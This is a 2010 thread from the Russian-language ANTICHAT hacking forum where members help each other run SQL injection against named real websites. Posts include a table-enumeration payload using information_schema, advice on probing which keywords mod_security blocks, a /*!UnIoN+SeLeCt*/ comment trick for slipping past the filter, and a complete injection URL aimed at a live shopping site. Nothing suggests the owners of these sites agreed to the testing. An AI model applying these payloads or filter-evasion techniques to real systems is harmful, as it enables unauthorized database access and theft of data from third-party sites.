HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #14691  
Старый 11.08.2010, 01:20
shuba
Постоянный
Регистрация: 22.05.2009
Сообщений: 514
Провел на форуме:
3579051

Репутация: 133


По умолчанию

вот в режиме онлайн http://fiascowines.ca/images/gallery/scan.php?
 
Ответить с цитированием

  #14692  
Старый 11.08.2010, 01:38
Electr0n
Познающий
Регистрация: 19.08.2009
Сообщений: 68
Провел на форуме:
2159875

Репутация: 446
По умолчанию

Фильтруется этот параметр? Чем можно заменить?

Код:
group_concat(table_name+separator+0x7c)+from+information_schema.tables+where+table_schema=
 
Ответить с цитированием

  #14693  
Старый 11.08.2010, 01:52
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


По умолчанию

Цитата:
Сообщение от Electr0n  
Фильтруется этот параметр? Чем можно заменить?
Код:
group_concat(table_name+separator+0x7c)+from+information_schema.tables+where+table_schema=
скажи что именно фильтруется
 
Ответить с цитированием

  #14694  
Старый 11.08.2010, 02:11
Electr0n
Познающий
Регистрация: 19.08.2009
Сообщений: 68
Провел на форуме:
2159875

Репутация: 446
По умолчанию

Konqi, что именно не могу понять, как проверить?
 
Ответить с цитированием

  #14695  
Старый 11.08.2010, 02:12
shuba
Постоянный
Регистрация: 22.05.2009
Сообщений: 514
Провел на форуме:
3579051

Репутация: 133


По умолчанию

А что именно то у тебя фильтруется???мб доступа нету к схеме?
 
Ответить с цитированием

  #14696  
Старый 11.08.2010, 02:16
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


По умолчанию

Цитата:
Сообщение от Electr0n  
Konqi
, что именно не могу понять, как проверить?
Потести разные словa,

union, select, group_concat, table_name, и т.п.

ошибка - не фильтрирует

forbidden - фильтрирует

если конечно это mod_security
 
Ответить с цитированием

  #14697  
Старый 11.08.2010, 02:26
Electr0n
Познающий
Регистрация: 19.08.2009
Сообщений: 68
Провел на форуме:
2159875

Репутация: 446
По умолчанию

Konqi, Вот так пропускает /*!UnIoN+SeLeCt*/ ошибки нет...

Как остальные запросы фильтровать?
 
Ответить с цитированием

  #14698  
Старый 11.08.2010, 02:33
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846

Репутация: 56
По умолчанию

Цитата:
Сообщение от Electr0n  
Konqi
, Вот так пропускает /*!UnIoN+SeLeCt*/ ошибки нет...
Как остальные запросы фильтровать?
/showpost.php?p=2289579&postcount=14624
 
Ответить с цитированием

  #14699  
Старый 11.08.2010, 02:34
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


По умолчанию

Цитата:
Сообщение от Electr0n  
Konqi
, Вот так пропускает /*!UnIoN+SeLeCt*/ ошибки нет...
Как остальные запросы фильтровать?
обход тем же способом что и union select

/threadnav46016-1343-10.html
 
Ответить с цитированием

  #14700  
Старый 11.08.2010, 02:51
Electr0n
Познающий
Регистрация: 19.08.2009
Сообщений: 68
Провел на форуме:
2159875

Репутация: 446
По умолчанию

Посмотрите пожалуйста фильтр, попробовал не получилось вывести таблицы...

Код:
http://www.maxxhits.com/index.php?phr=Shopping&cid=14&id=-5+/*!UnIoN+SeLeCt*/+1,version(),3,4,5,6,7--
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.